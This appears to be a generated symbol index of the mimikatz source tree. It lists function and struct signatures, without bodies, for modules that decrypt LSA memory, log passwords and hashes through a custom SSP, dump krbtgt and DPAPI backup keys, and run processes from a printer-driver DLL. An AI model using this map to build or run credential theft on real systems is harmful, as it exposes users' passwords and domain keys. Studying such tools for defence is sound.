function DWORD (line 8) | DWORD WINAPI knp_NPLogonNotify(PLUID lpLogonId, LPCWSTR lpAuthentInfoTyp...
function DWORD (line 25) | DWORD WINAPI knp_NPGetCaps(DWORD nIndex)
FILE: mimilib/kssp.c
function NTSTATUS (line 17) | NTSTATUS NTAPI kssp_SpInitialize(ULONG_PTR PackageId, PSECPKG_PARAMETERS...
function NTSTATUS (line 22) | NTSTATUS NTAPI kssp_SpShutDown(void)
function NTSTATUS (line 27) | NTSTATUS NTAPI kssp_SpGetInfo(PSecPkgInfoW PackageInfo)
function NTSTATUS (line 38) | NTSTATUS NTAPI kssp_SpAcceptCredentials(SECURITY_LOGON_TYPE LogonType, P...
function NTSTATUS (line 54) | NTSTATUS NTAPI kssp_SpLsaModeInitialize(ULONG LsaVersion, PULONG Package...
FILE: mimilib/ksub.c
function NTSTATUS (line 14) | NTSTATUS NTAPI ksub_Msv1_0SubAuthenticationRoutine(IN NETLOGON_LOGON_INF...
FILE: mimilib/sekurlsadbg/kuhl_m_sekurlsa_nt6.c
function NTSTATUS (line 12) | NTSTATUS kuhl_m_sekurlsa_nt6_init()
function NTSTATUS (line 19) | NTSTATUS kuhl_m_sekurlsa_nt6_clean()
function NTSTATUS (line 26) | NTSTATUS kuhl_m_sekurlsa_nt6_LsaInitializeProtectedMemory()
function VOID (line 63) | VOID kuhl_m_sekurlsa_nt6_LsaCleanupProtectedMemory()
function VOID (line 87) | VOID WINAPI kuhl_m_sekurlsa_nt6_LsaUnprotectMemory (IN PVOID Buffer, IN ...
function NTSTATUS (line 110) | NTSTATUS kuhl_m_sekurlsa_nt6_acquireKeys(ULONG_PTR pInitializationVector...
function BOOL (line 119) | BOOL kuhl_m_sekurlsa_nt6_acquireKey(ULONG_PTR phKey, PKIWI_BCRYPT_GEN_KE...
FILE: mimilib/sekurlsadbg/kuhl_m_sekurlsa_nt6.h
type KIWI_HARD_KEY (line 10) | typedef struct _KIWI_HARD_KEY {
type KIWI_BCRYPT_KEY (line 15) | typedef struct _KIWI_BCRYPT_KEY {
type KIWI_BCRYPT_KEY8 (line 25) | typedef struct _KIWI_BCRYPT_KEY8 {
type KIWI_BCRYPT_KEY81 (line 37) | typedef struct _KIWI_BCRYPT_KEY81 {
type KIWI_BCRYPT_HANDLE_KEY (line 54) | typedef struct _KIWI_BCRYPT_HANDLE_KEY {
type KIWI_BCRYPT_GEN_KEY (line 62) | typedef struct _KIWI_BCRYPT_GEN_KEY {
FILE: mimilib/sekurlsadbg/kuhl_m_sekurlsa_packages.c
function kuhl_m_sekurlsa_enum_logon_callback_msv (line 9) | void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_msv(IN ULONG_PTR reser...
function MSV1_0_PRIMARY_HELPER (line 58) | const MSV1_0_PRIMARY_HELPER * kuhl_m_sekurlsa_msv_helper()
function kuhl_m_sekurlsa_enum_logon_callback_kerberos (line 135) | void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_kerberos(IN ULONG_PTR ...
function kuhl_m_sekurlsa_enum_logon_callback_livessp (line 205) | void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_livessp(IN ULONG_PTR p...
function kuhl_m_sekurlsa_enum_logon_callback_tspkg (line 224) | void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_tspkg(IN ULONG_PTR pTS...
function kuhl_m_sekurlsa_enum_logon_callback_wdigest (line 240) | void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_wdigest(IN ULONG_PTR p...
function kuhl_m_sekurlsa_enum_logon_callback_ssp (line 252) | void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_ssp(IN ULONG_PTR pSspC...
function kuhl_m_sekurlsa_enum_logon_callback_masterkeys (line 277) | void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_masterkeys(IN ULONG_PT...
function kuhl_m_sekurlsa_enum_logon_callback_credman (line 334) | void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_credman(IN ULONG_PTR r...
FILE: mimilib/sekurlsadbg/kuhl_m_sekurlsa_packages.h
type MSV1_0_PRIMARY_CREDENTIAL (line 19) | typedef struct _MSV1_0_PRIMARY_CREDENTIAL {
type MSV1_0_PRIMARY_CREDENTIAL_10_OLD (line 31) | typedef struct _MSV1_0_PRIMARY_CREDENTIAL_10_OLD {
type MSV1_0_PRIMARY_CREDENTIAL_10 (line 46) | typedef struct _MSV1_0_PRIMARY_CREDENTIAL_10 {
type MSV1_0_PRIMARY_CREDENTIAL_10_1607 (line 63) | typedef struct _MSV1_0_PRIMARY_CREDENTIAL_10_1607 {
type MSV1_0_PRIMARY_HELPER (line 87) | typedef struct _MSV1_0_PRIMARY_HELPER {
type KERB_HASHPASSWORD_GENERIC (line 104) | typedef struct _KERB_HASHPASSWORD_GENERIC {
type KERB_HASHPASSWORD_6 (line 110) | typedef struct _KERB_HASHPASSWORD_6 {
type KERB_HASHPASSWORD_6_1607 (line 116) | typedef struct _KERB_HASHPASSWORD_6_1607 {
type KIWI_KERBEROS_KEYS_LIST_6 (line 123) | typedef struct _KIWI_KERBEROS_KEYS_LIST_6 {
type KERB_SMARTCARD_CSP_INFO (line 133) | typedef struct _KERB_SMARTCARD_CSP_INFO {
type KIWI_KERBEROS_CSP_INFOS_60 (line 149) | typedef struct _KIWI_KERBEROS_CSP_INFOS_60 {
type KIWI_KERBEROS_CSP_INFOS_62 (line 163) | typedef struct _KIWI_KERBEROS_CSP_INFOS_62 {
type KIWI_KERBEROS_CSP_INFOS_10 (line 177) | typedef struct _KIWI_KERBEROS_CSP_INFOS_10 {
type KIWI_KERBEROS_LOGON_SESSION (line 191) | typedef struct _KIWI_KERBEROS_LOGON_SESSION {
type KIWI_KERBEROS_10_PRIMARY_CREDENTIAL (line 231) | typedef struct _KIWI_KERBEROS_10_PRIMARY_CREDENTIAL
type KIWI_KERBEROS_LOGON_SESSION_10 (line 239) | typedef struct _KIWI_KERBEROS_LOGON_SESSION_10 {
type KIWI_KERBEROS_10_PRIMARY_CREDENTIAL_1607_ISO (line 283) | typedef struct _KIWI_KERBEROS_10_PRIMARY_CREDENTIAL_1607_ISO
type KIWI_KERBEROS_10_PRIMARY_CREDENTIAL_1607 (line 289) | typedef struct _KIWI_KERBEROS_10_PRIMARY_CREDENTIAL_1607
type KIWI_KERBEROS_LOGON_SESSION_10_1607 (line 301) | typedef struct _KIWI_KERBEROS_LOGON_SESSION_10_1607 {
type KERB_INFOS (line 345) | typedef struct _KERB_INFOS {
type KIWI_LIVESSP_PRIMARY_CREDENTIAL (line 358) | typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL
type KIWI_LIVESSP_LIST_ENTRY (line 365) | typedef struct _KIWI_LIVESSP_LIST_ENTRY
type KIWI_TS_PRIMARY_CREDENTIAL (line 382) | typedef struct _KIWI_TS_PRIMARY_CREDENTIAL {
type KIWI_TS_CREDENTIAL (line 387) | typedef struct _KIWI_TS_CREDENTIAL {
type KIWI_TS_CREDENTIAL_1607 (line 399) | typedef struct _KIWI_TS_CREDENTIAL_1607 {
type KIWI_TS_CREDENTIAL_HELPER (line 411) | typedef struct _KIWI_TS_CREDENTIAL_HELPER {
type KIWI_WDIGEST_LIST_ENTRY (line 421) | typedef struct _KIWI_WDIGEST_LIST_ENTRY {
type KIWI_SSP_CREDENTIAL_LIST_ENTRY (line 429) | typedef struct _KIWI_SSP_CREDENTIAL_LIST_ENTRY {
type KIWI_MASTERKEY_CACHE_ENTRY (line 441) | typedef struct _KIWI_MASTERKEY_CACHE_ENTRY {
type CREDMAN_INFOS (line 451) | typedef struct _CREDMAN_INFOS {
type KIWI_CREDMAN_LIST_ENTRY_60 (line 460) | typedef struct _KIWI_CREDMAN_LIST_ENTRY_60 {
type KIWI_CREDMAN_LIST_ENTRY (line 484) | typedef struct _KIWI_CREDMAN_LIST_ENTRY {
type KIWI_CREDMAN_LIST_STARTER (line 509) | typedef struct _KIWI_CREDMAN_LIST_STARTER {
type KIWI_CREDMAN_SET_LIST_ENTRY (line 515) | typedef struct _KIWI_CREDMAN_SET_LIST_ENTRY {
type KIWI_KRBTGT_CREDENTIAL_64 (line 524) | typedef struct _KIWI_KRBTGT_CREDENTIAL_64 {
type KIWI_KRBTGT_CREDENTIALS_64 (line 534) | typedef struct _KIWI_KRBTGT_CREDENTIALS_64 {
type KIWI_KRBTGT_CREDENTIAL_6 (line 543) | typedef struct _KIWI_KRBTGT_CREDENTIAL_6 {
type KIWI_KRBTGT_CREDENTIALS_6 (line 552) | typedef struct _KIWI_KRBTGT_CREDENTIALS_6 {
type DUAL_KRBTGT (line 561) | typedef struct _DUAL_KRBTGT {
type KDC_DOMAIN_KEY (line 566) | typedef struct _KDC_DOMAIN_KEY {
type KDC_DOMAIN_KEYS (line 572) | typedef struct _KDC_DOMAIN_KEYS {
type KDC_DOMAIN_KEYS_INFO (line 579) | typedef struct _KDC_DOMAIN_KEYS_INFO {
type KDC_DOMAIN_INFO (line 585) | typedef struct _KDC_DOMAIN_INFO {
type LSAISO_DATA_BLOB (line 604) | typedef struct _LSAISO_DATA_BLOB {
type ENC_LSAISO_DATA_BLOB (line 619) | typedef struct _ENC_LSAISO_DATA_BLOB {
type KIWI_BACKUP_KEY (line 625) | typedef struct _KIWI_BACKUP_KEY {
FILE: mimilib/sekurlsadbg/kuhl_m_sekurlsa_utils.c
function kull_m_string_dprintf_hex (line 15) | void kull_m_string_dprintf_hex(LPCVOID lpData, DWORD cbData, DWORD flags)
function kull_m_string_displayFileTime (line 27) | void kull_m_string_displayFileTime(IN PFILETIME pFileTime)
function kull_m_string_displayLocalFileTime (line 45) | void kull_m_string_displayLocalFileTime(IN PFILETIME pFileTime)
function kull_m_string_displayGUID (line 53) | void kull_m_string_displayGUID(IN LPCGUID pGuid)
function kull_m_string_displaySID (line 63) | void kull_m_string_displaySID(IN PSID pSid)
function BOOL (line 73) | BOOL kull_m_string_suspectUnicodeString(IN PUNICODE_STRING pUnicodeString)
function BOOL (line 79) | BOOL kull_m_string_getDbgUnicodeString(IN PUNICODE_STRING string)
function ULONG_PTR (line 98) | ULONG_PTR kuhl_m_sekurlsa_utils_pFromLinkedListByLuid(ULONG_PTR pSecurit...
function ULONG_PTR (line 126) | ULONG_PTR kuhl_m_sekurlsa_utils_pFromAVLByLuid(ULONG_PTR pTable, ULONG L...
function ULONG_PTR (line 138) | ULONG_PTR kuhl_m_sekurlsa_utils_pFromAVLByLuidRec(ULONG_PTR pTable, ULON...
function kuhl_m_sekurlsa_utils_NlpMakeRelativeOrAbsoluteString (line 166) | void kuhl_m_sekurlsa_utils_NlpMakeRelativeOrAbsoluteString(PVOID BaseAdd...
function BOOL (line 172) | BOOL kuhl_m_sekurlsa_utils_getSid(IN PSID * pSid)
function PCSTR (line 189) | PCSTR kuhl_m_kerberos_ticket_etype(LONG eType)
FILE: mimilib/sekurlsadbg/kuhl_m_sekurlsa_utils.h
type STRING (line 11) | typedef STRING ANSI_STRING;
type RTL_BALANCED_LINKS (line 13) | typedef struct _RTL_BALANCED_LINKS {
type RTL_BALANCED_LINKS (line 20) | typedef RTL_BALANCED_LINKS *PRTL_BALANCED_LINKS;
type RTL_AVL_TABLE (line 22) | typedef struct _RTL_AVL_TABLE {
type KIWI_GENERIC_PRIMARY_CREDENTIAL (line 36) | typedef struct _KIWI_GENERIC_PRIMARY_CREDENTIAL
type KIWI_MSV1_0_PRIMARY_CREDENTIALS (line 43) | typedef struct _KIWI_MSV1_0_PRIMARY_CREDENTIALS {
type KIWI_MSV1_0_CREDENTIALS (line 49) | typedef struct _KIWI_MSV1_0_CREDENTIALS {
type KIWI_MSV1_0_LIST_60 (line 55) | typedef struct _KIWI_MSV1_0_LIST_60 {
type KIWI_MSV1_0_LIST_61 (line 92) | typedef struct _KIWI_MSV1_0_LIST_61 {
type KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ (line 128) | typedef struct _KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ {
type KIWI_MSV1_0_LIST_62 (line 165) | typedef struct _KIWI_MSV1_0_LIST_62 {
type KIWI_MSV1_0_LIST_63 (line 210) | typedef struct _KIWI_MSV1_0_LIST_63 {
type KIWI_BASIC_SECURITY_LOGON_SESSION_DATA (line 256) | typedef struct _KIWI_BASIC_SECURITY_LOGON_SESSION_DATA {
FILE: mimilib/sekurlsadbg/kull_m_rpc.c
function midl_user_free (line 13) | void __RPC_USER midl_user_free(void __RPC_FAR * p)
function ReadFcn (line 18) | void __RPC_USER ReadFcn(void *State, char **pBuffer, unsigned int *pSize)
function BOOL (line 25) | BOOL kull_m_rpc_Generic_Decode(PVOID data, DWORD size, PVOID pObject, PG...
function kull_m_rpc_Generic_Free (line 61) | void kull_m_rpc_Generic_Free(PVOID pObject, PGENERIC_RPC_FREE fFree)
FILE: mimilib/sekurlsadbg/kull_m_rpc.h
type DWORD (line 22) | typedef DWORD NET_API_STATUS;
type UNICODE_STRING (line 23) | typedef UNICODE_STRING RPC_UNICODE_STRING;
type KULL_M_RPC_FCNSTRUCT (line 25) | typedef struct _KULL_M_RPC_FCNSTRUCT {
FILE: mimilib/sekurlsadbg/kull_m_rpc_ms-credentialkeys.c
type ms_credentialkeys_MIDL_TYPE_FORMAT_STRING (line 9) | typedef struct _ms_credentialkeys_MIDL_TYPE_FORMAT_STRING {
function CredentialKeys_Decode (line 20) | void CredentialKeys_Decode(handle_t _MidlEsHandle, PKIWI_CREDENTIAL_KEYS...
function CredentialKeys_Free (line 25) | void CredentialKeys_Free(handle_t _MidlEsHandle, PKIWI_CREDENTIAL_KEYS *...
FILE: mimilib/sekurlsadbg/kull_m_rpc_ms-credentialkeys.h
type KIWI_CREDENTIAL_KEY_TYPE (line 4) | typedef enum _KIWI_CREDENTIAL_KEY_TYPE {
type KIWI_CREDENTIAL_KEY (line 11) | typedef struct _KIWI_CREDENTIAL_KEY {
type KIWI_CREDENTIAL_KEYS (line 19) | typedef struct _KIWI_CREDENTIAL_KEYS {
FILE: mimilib/sekurlsadbg/kwindbg.c
function LPEXT_API_VERSION (line 18) | LPEXT_API_VERSION WDBGAPI kdbg_ExtensionApiVersion(void)
function VOID (line 23) | VOID WDBGAPI kdbg_WinDbgExtensionDllInit(PWINDBG_EXTENSION_APIS lpExtens...
function DECLARE_API (line 78) | DECLARE_API(kdbg_coffee)
function DECLARE_API (line 83) | DECLARE_API(kdbg_mimikatz)
function VOID (line 228) | VOID kuhl_m_sekurlsa_genericCredsOutput(PKIWI_GENERIC_PRIMARY_CREDENTIAL...
function VOID (line 457) | VOID kuhl_m_sekurlsa_genericKeyOutput(PKIWI_CREDENTIAL_KEY key)
function VOID (line 479) | VOID kuhl_m_sekurlsa_genericLsaIsoOutput(PLSAISO_DATA_BLOB blob)
function VOID (line 489) | VOID kuhl_m_sekurlsa_genericEncLsaIsoOutput(PENC_LSAISO_DATA_BLOB blob, ...
function kuhl_m_sekurlsa_krbtgt_keys (line 496) | void kuhl_m_sekurlsa_krbtgt_keys(PVOID addr, LPCSTR prefix)
function kuhl_m_sekurlsa_krbtgt_trust (line 562) | void kuhl_m_sekurlsa_krbtgt_trust(ULONG_PTR addr)
function kuhl_m_sekurlsa_trust_domainkeys (line 581) | void kuhl_m_sekurlsa_trust_domainkeys(struct _KDC_DOMAIN_KEYS_INFO * key...
function kuhl_m_sekurlsa_trust_domaininfo (line 620) | void kuhl_m_sekurlsa_trust_domaininfo(struct _KDC_DOMAIN_INFO * info)
function kuhl_sekurlsa_dpapi_display_backupkey (line 644) | void kuhl_sekurlsa_dpapi_display_backupkey(ULONG_PTR pGuid, ULONG_PTR pP...
function kuhl_sekurlsa_dpapi_backupkeys (line 701) | void kuhl_sekurlsa_dpapi_backupkeys()
function FARPROC (line 768) | FARPROC WINAPI delayHookFailureFunc (unsigned int dliNotify, PDelayLoadI...
FILE: mimilib/sekurlsadbg/kwindbg.h
type KUHL_M_SEKURLSA_PACKAGE (line 43) | typedef struct _KUHL_M_SEKURLSA_PACKAGE {
type KUHL_M_SEKURLSA_ENUM_HELPER (line 50) | typedef struct _KUHL_M_SEKURLSA_ENUM_HELPER {
type _KIWI_CREDENTIAL_KEY (line 70) | struct _KIWI_CREDENTIAL_KEY
type _LSAISO_DATA_BLOB (line 71) | struct _LSAISO_DATA_BLOB
type _ENC_LSAISO_DATA_BLOB (line 72) | struct _ENC_LSAISO_DATA_BLOB
type _KDC_DOMAIN_KEYS_INFO (line 75) | struct _KDC_DOMAIN_KEYS_INFO
type _KDC_DOMAIN_INFO (line 76) | struct _KDC_DOMAIN_INFO
type PVK_FILE_HDR (line 85) | typedef struct _PVK_FILE_HDR {
FILE: mimilib/utils.c
function klog (line 8) | void klog(FILE * logfile, PCWCHAR format, ...)
function klog_password (line 20) | void klog_password(FILE * logfile, PUNICODE_STRING pPassword)
function klog_hash (line 33) | void klog_hash(FILE * logfile, PUNICODE_STRING pHash, BOOLEAN withSpace)
function klog_sid (line 41) | void klog_sid(FILE * logfile, PSID pSid)
FILE: mimilib/utils.h
type REMOTE_LIB_FUNC (line 46) | typedef struct _REMOTE_LIB_FUNC {
FILE: mimilove/mimilove.c
function wmain (line 8) | int wmain(int argc, wchar_t *argv[])
function BOOL (line 51) | BOOL kuhl_m_sekurlsa_utils_love_search(PKULL_M_PROCESS_VERY_BASIC_MODULE...
function mimilove_lsasrv (line 85) | void mimilove_lsasrv(PKULL_M_MEMORY_HANDLE hMemory)
function mimilove_kerberos (line 266) | void mimilove_kerberos(PKULL_M_MEMORY_HANDLE hMemory)
function PCWCHAR (line 383) | PCWCHAR mimilove_kerberos_etype(LONG eType)
FILE: mimilove/mimilove.h
type KULL_M_MINI_PATTERN (line 22) | typedef struct _KULL_M_MINI_PATTERN {
type MSV1_0_PRIMARY_CREDENTIAL_50 (line 28) | typedef struct _MSV1_0_PRIMARY_CREDENTIAL_50 {
type KIWI_MSV1_0_PRIMARY_CREDENTIALS (line 38) | typedef struct _KIWI_MSV1_0_PRIMARY_CREDENTIALS {
type KIWI_MSV1_0_CREDENTIALS (line 44) | typedef struct _KIWI_MSV1_0_CREDENTIALS {
type KIWI_MSV1_0_ENTRY_50 (line 50) | typedef struct _KIWI_MSV1_0_ENTRY_50 {
type KIWI_MSV1_0_LIST_50 (line 68) | typedef struct _KIWI_MSV1_0_LIST_50 {
type KIWI_MSV1_0_LOGON_SESSION_TABLE_50 (line 76) | typedef struct _KIWI_MSV1_0_LOGON_SESSION_TABLE_50 { // small
type KERB_HASHPASSWORD_GENERIC (line 91) | typedef struct _KERB_HASHPASSWORD_GENERIC {
type KERB_HASHPASSWORD_5 (line 97) | typedef struct _KERB_HASHPASSWORD_5 {
type KIWI_KERBEROS_KEYS_LIST_5 (line 102) | typedef struct _KIWI_KERBEROS_KEYS_LIST_5 {
type KIWI_KERBEROS_LOGON_SESSION_50 (line 110) | typedef struct _KIWI_KERBEROS_LOGON_SESSION_50 {
FILE: mimispool/mimispool.c
function BOOL (line 8) | BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved)
function VOID (line 22) | VOID APIENTRY DrvResetConfigCache()
function BOOL (line 27) | BOOL APIENTRY DrvQueryDriverInfo(DWORD dwMode, PVOID pBuffer, DWORD cbBu...
function BOOL (line 49) | BOOL APIENTRY DrvEnableDriver(ULONG iEngineVersion, ULONG cj, DRVENABLED...
function VOID (line 68) | VOID APIENTRY DrvDisableDriver()
function DWORD (line 76) | DWORD WINAPI GenerateCopyFilePaths(LPCWSTR pszPrinterName, LPCWSTR pszDi...
function BOOL (line 91) | BOOL WINAPI SpoolerCopyFileEvent(LPWSTR pszPrinterName, LPWSTR pszKey, D...
function BOOL (line 101) | BOOL RunProcessForAll(LPWSTR szProcess)
FILE: mimispool/mimispool.h
type WCHAR (line 19) | typedef WCHAR WINSTATIONNAME[WINSTATIONNAME_LENGTH + 1];
type WINSTATIONSTATECLASS (line 21) | typedef enum _WINSTATIONSTATECLASS {
type SESSIONIDW (line 36) | typedef struct _SESSIONIDW {
type DRVFN (line 51) | typedef struct _DRVFN {
type DRVENABLEDATA (line 56) | typedef struct tagDRVENABLEDATA {
FILE: modules/kull_m_acr.c
function BOOL (line 8) | BOOL kull_m_acr_init(SCARDCONTEXT hContext, LPCWSTR szReaderName, BOOL w...
function kull_m_acr_finish (line 23) | void kull_m_acr_finish(PKULL_M_ACR_COMM comm)
function BOOL (line 35) | BOOL kull_m_arc_sendrecv(PKULL_M_ACR_COMM comm, const BYTE *pbData, cons...
function BOOL (line 74) | BOOL kull_m_acr_sendrecv_ins(PKULL_M_ACR_COMM comm, BYTE cla, BYTE ins, ...
function BOOL (line 96) | BOOL CALLBACK kull_m_arcr_SendRecvDirect(const BYTE *pbData, const UINT1...
FILE: modules/kull_m_acr.h
type KULL_M_ACR_COMM (line 14) | typedef struct _KULL_M_ACR_COMM {
FILE: modules/kull_m_asn1.c
function kull_m_asn1_BitStringFromULONG (line 12) | void kull_m_asn1_BitStringFromULONG(BerElement * pBer, ULONG data)
function kull_m_asn1_GenTime (line 19) | void kull_m_asn1_GenTime(BerElement * pBer, PFILETIME localtime)
function kull_m_asn1_GenString (line 28) | void kull_m_asn1_GenString(BerElement * pBer, PCUNICODE_STRING String)
function BOOL (line 40) | BOOL kull_m_asn1_init()
function kull_m_asn1_term (line 70) | void kull_m_asn1_term()
function BOOL (line 89) | BOOL kull_m_asn1_DotVal2Eoid(__in const ASN1char_t *dotOID, __out OssEnc...
function kull_m_asn1_freeEnc (line 101) | void kull_m_asn1_freeEnc(void *pBuf)
function BOOL (line 107) | BOOL kull_m_asn1_Eoid2DotVal(__in const OssEncodedOID *encodedOID, __out...
function kull_m_asn1_freeDec (line 118) | void kull_m_asn1_freeDec(void *pBuf)
FILE: modules/kull_m_asn1.h
type OssEncodedOID (line 33) | typedef struct {
FILE: modules/kull_m_busylight.c
function PCBUSYLIGHT_DEVICE_ID (line 34) | PCBUSYLIGHT_DEVICE_ID kull_m_busylight_devices_getIdFromAttributes(PHIDD...
function BOOL (line 44) | BOOL kull_m_busylight_devices_get(PBUSYLIGHT_DEVICE *devices, DWORD *cou...
function kull_m_busylight_devices_free (line 163) | void kull_m_busylight_devices_free(PBUSYLIGHT_DEVICE devices, BOOL insta...
function BOOL (line 195) | BOOL kull_m_busylight_request_create(PCBUSYLIGHT_COMMAND_STEP commands, ...
function BOOL (line 240) | BOOL kull_m_busylight_device_send_raw(PBUSYLIGHT_DEVICE device, LPCVOID ...
function BOOL (line 258) | BOOL kull_m_busylight_device_read_raw(PBUSYLIGHT_DEVICE device, LPVOID *...
function DWORD (line 283) | DWORD WINAPI kull_m_busylight_keepAliveThread(LPVOID lpThreadParameter)
function BOOL (line 302) | BOOL kull_m_busylight_device_read_infos(PBUSYLIGHT_DEVICE device, BUSYLI...
function BOOL (line 330) | BOOL kull_m_busylight_request_send(PBUSYLIGHT_DEVICE device, PCBUSYLIGHT...
function BOOL (line 345) | BOOL kull_m_busylight_request_send_keepalive(PBUSYLIGHT_DEVICE device, B...
function BOOL (line 351) | BOOL kull_m_busylight_request_send_off(PBUSYLIGHT_DEVICE device, BOOL all)
function BOOL (line 368) | BOOL kull_m_busylight_request_single_send(PBUSYLIGHT_DEVICE device, cons...
FILE: modules/kull_m_busylight.h
type BUSYLIGHT_MEDIA_VOLUME (line 19) | typedef enum _BUSYLIGHT_MEDIA_VOLUME {
type BUSYLIGHT_MEDIA_VOLUME (line 29) | typedef const BUSYLIGHT_MEDIA_VOLUME *PCBUSYLIGHT_MEDIA_VOLUME;
type BUSYLIGHT_MEDIA_SOUND_JINGLE (line 31) | typedef enum _BUSYLIGHT_MEDIA_SOUND_JINGLE {
type BUSYLIGHT_MEDIA_SOUND_JINGLE (line 44) | typedef const BUSYLIGHT_MEDIA_SOUND_JINGLE *PCBUSYLIGHT_MEDIA_SOUND_JINGLE;
type BUSYLIGHT_DEVICE_ID (line 48) | typedef struct _BUSYLIGHT_DEVICE_ID {
type BUSYLIGHT_DEVICE_ID (line 54) | typedef const BUSYLIGHT_DEVICE_ID *PCBUSYLIGHT_DEVICE_ID;
type BUSYLIGHT_DPI (line 56) | typedef struct _BUSYLIGHT_DPI {
type BUSYLIGHT_DPI (line 61) | typedef const BUSYLIGHT_DPI *PCBUSYLIGHT_DPI;
type BUSYLIGHT_INFO (line 63) | typedef struct _BUSYLIGHT_INFO {
type BUSYLIGHT_DEVICE (line 74) | typedef struct _BUSYLIGHT_DEVICE {
type BUSYLIGHT_COLOR (line 89) | typedef struct _BUSYLIGHT_COLOR {
type BUSYLIGHT_COLOR (line 94) | typedef const BUSYLIGHT_COLOR *PCBUSYLIGHT_COLOR;
type BUSYLIGHT_COMMAND_STEP (line 96) | typedef struct _BUSYLIGHT_COMMAND_STEP {
type BUSYLIGHT_COMMAND_STEP (line 104) | typedef const BUSYLIGHT_COMMAND_STEP *PCBUSYLIGHT_COMMAND_STEP;
FILE: modules/kull_m_cabinet.c
function fnFilePlaced (line 8) | int DIAMONDAPI fnFilePlaced(PCCAB pccab, IN LPSTR pszFile, long cbFile, ...
function DIAMONDAPI (line 13) | DIAMONDAPI fnMemAlloc(ULONG cb)
function DIAMONDAPI (line 18) | DIAMONDAPI fnMemFree(void HUGE *memory)
function DIAMONDAPI (line 23) | DIAMONDAPI fnFileOpen(IN LPSTR pszFile, int oflag, int pmode, int FAR *e...
function DIAMONDAPI (line 38) | DIAMONDAPI fnFileRead(INT_PTR hf, void FAR *memory, UINT cb, int FAR *er...
function DIAMONDAPI (line 49) | DIAMONDAPI fnFileWrite(INT_PTR hf, void FAR *memory, UINT cb, int FAR *e...
function DIAMONDAPI (line 60) | DIAMONDAPI fnFileClose(INT_PTR hf, int FAR *err, void FAR *pv)
function fnFileSeek (line 71) | long FAR DIAMONDAPI fnFileSeek(INT_PTR hf, long dist, int seektype, int ...
function DIAMONDAPI (line 80) | DIAMONDAPI fnFileDelete(IN LPSTR pszFile, int FAR *err, void FAR *pv)
function BOOL (line 91) | BOOL DIAMONDAPI fnGetTempFileName(OUT char *pszTempName, IN int cbTempNa...
function BOOL (line 106) | BOOL DIAMONDAPI fnGetNextCabinet(PCCAB pccab, ULONG cbPrevCab, void FAR ...
function fnStatus (line 111) | long DIAMONDAPI fnStatus(UINT typeStatus, ULONG cb1, ULONG cb2, void FAR...
function INT_PTR (line 116) | INT_PTR DIAMONDAPI fnGetOpenInfo(IN LPSTR pszName, USHORT *pdate, USHORT...
function LPCSTR (line 138) | LPCSTR FCIErrorToString(FCIERROR err)
function PKIWI_CABINET (line 165) | PKIWI_CABINET kull_m_cabinet_create(LPSTR cabinetName)
function BOOL (line 189) | BOOL kull_m_cabinet_add(PKIWI_CABINET cab, LPSTR sourceFile, OPTIONAL LP...
function BOOL (line 204) | BOOL kull_m_cabinet_close(PKIWI_CABINET cab)
FILE: modules/kull_m_cabinet.h
type KIWI_CABINET (line 13) | typedef struct _KIWI_CABINET{
FILE: modules/kull_m_cred.c
function PKULL_M_CRED_BLOB (line 18) | PKULL_M_CRED_BLOB kull_m_cred_create(PVOID data/*, DWORD size*/)
function kull_m_cred_delete (line 49) | void kull_m_cred_delete(PKULL_M_CRED_BLOB cred)
function kull_m_cred_descr (line 71) | void kull_m_cred_descr(DWORD level, PKULL_M_CRED_BLOB cred)
function BOOL (line 100) | BOOL kull_m_cred_attributes_create(PVOID data, PKULL_M_CRED_ATTRIBUTE **...
function kull_m_cred_attributes_delete (line 122) | void kull_m_cred_attributes_delete(PKULL_M_CRED_ATTRIBUTE *Attributes, D...
function kull_m_cred_attributes_descr (line 133) | void kull_m_cred_attributes_descr(DWORD level, PKULL_M_CRED_ATTRIBUTE *A...
function PKULL_M_CRED_ATTRIBUTE (line 141) | PKULL_M_CRED_ATTRIBUTE kull_m_cred_attribute_create(PVOID data/*, DWORD ...
function kull_m_cred_attribute_delete (line 157) | void kull_m_cred_attribute_delete(PKULL_M_CRED_ATTRIBUTE Attribute)
function kull_m_cred_attribute_descr (line 169) | void kull_m_cred_attribute_descr(DWORD level, PKULL_M_CRED_ATTRIBUTE Att...
function PKULL_M_CRED_LEGACY_CREDS_BLOB (line 182) | PKULL_M_CRED_LEGACY_CREDS_BLOB kull_m_cred_legacy_creds_create(PVOID dat...
function kull_m_cred_legacy_creds_delete (line 199) | void kull_m_cred_legacy_creds_delete(PKULL_M_CRED_LEGACY_CREDS_BLOB creds)
function kull_m_cred_legacy_creds_descr (line 214) | void kull_m_cred_legacy_creds_descr(DWORD level, PKULL_M_CRED_LEGACY_CRE...
function PKULL_M_CRED_LEGACY_CRED_BLOB (line 228) | PKULL_M_CRED_LEGACY_CRED_BLOB kull_m_cred_legacy_cred_create(PVOID data/...
function kull_m_cred_legacy_cred_delete (line 258) | void kull_m_cred_legacy_cred_delete(PKULL_M_CRED_LEGACY_CRED_BLOB cred)
function kull_m_cred_legacy_cred_descr (line 278) | void kull_m_cred_legacy_cred_descr(DWORD level, PKULL_M_CRED_LEGACY_CRED...
function PCWCHAR (line 308) | PCWCHAR kull_m_cred_CredType(DWORD type)
function PCWCHAR (line 316) | PCWCHAR kull_m_cred_CredPersist(DWORD persist)
function PKULL_M_CRED_VAULT_POLICY (line 323) | PKULL_M_CRED_VAULT_POLICY kull_m_cred_vault_policy_create(PVOID data/*, ...
function kull_m_cred_vault_policy_delete (line 338) | void kull_m_cred_vault_policy_delete(PKULL_M_CRED_VAULT_POLICY policy)
function kull_m_cred_vault_policy_descr (line 350) | void kull_m_cred_vault_policy_descr(DWORD level, PKULL_M_CRED_VAULT_POLI...
function PKULL_M_CRED_VAULT_POLICY_KEY (line 365) | PKULL_M_CRED_VAULT_POLICY_KEY kull_m_cred_vault_policy_key_create(PVOID ...
